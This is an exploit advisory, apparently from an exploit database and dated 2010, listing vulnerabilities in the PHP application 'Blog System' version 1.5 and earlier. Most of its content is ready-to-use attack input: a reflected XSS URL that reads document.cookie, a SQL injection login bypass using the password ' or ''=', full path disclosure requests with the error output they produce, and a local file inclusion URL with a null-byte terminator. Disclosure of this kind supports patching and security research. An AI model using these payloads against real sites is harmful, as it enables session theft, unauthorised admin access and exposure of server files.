# Exploit Title: Blog System <= 1.5 Multiple Vulnerabilities# Date: 04/04/10# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com<http://gmail.com> | www.DigitalWhisper.co.il<http://www.DigitalWhisper.co.il># Software Link: http://www.netartmedia.net/blogsystem/ | http://www.netartmedia.net/blogsystem/demo.html# Version: <= 1.5# Tested on: PHP###[Cross Site Scripting]*(Cross-Site Scripting attacks are a type of injection problem,in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses inputfrom a user in the output it generates without validating or encoding it)
http://[SERVER]/ADMIN/index.php?category=(home|comments|lists|habillage|info)&action=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
####[SQL Injection](A SQL injection attack consists of insertion or"injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system andin some cases issue commands to the operating system. SQL injection attacks are a type of injection attack,in which SQL commands are injected into data-plane inputin order to effect the execution of predefined SQL commands.)#
http://[SERVER]/index.php
#
i.e.:#
User: admin
Pass:' or ''='####[FULL PATH DICSLOSURE]**(Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.:/home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file()(within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view.(OWASP))#
The following pages require files without checking if they exist. loading them will return a Fatal Errors and Warnings ("No such file or directory")with includes their Full-Path:#
http://[SERVER]/ADMIN/index.php?category=(home|comments|lists|habillage|info)&action=cP
#
Will returne:#
Warning: include(home/cP.php)[function.include]: failed to open stream: No such fileor directory in[FPD] on line 332
Warning: include(home/cP.php)[function.include]: failed to open stream: No such fileor directory in[FPD] on line 332
Warning: include()[function.include]: Failed opening 'home/pa.php'for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php')in[FPD] on line 332##
http://[SERVER]/blog.php?user=admin&month2=4&year2=aaaaaaaaaaaaa
#
Will Returne:#
Warning: mktime() expects parameter 6 to be long, string given in[FPD] on line 179
Warning: mktime() expects parameter 6 to be long, string given in[FPD] on line 180####[LOCAL FILE INCLUSION]**
http://[SERVER]/ADMIN/index.php?category=(home|comments|lists|habillage|info)&action=[LFI]%00##*The victim must be logged in.**The attacker must be logged in.##[e0f]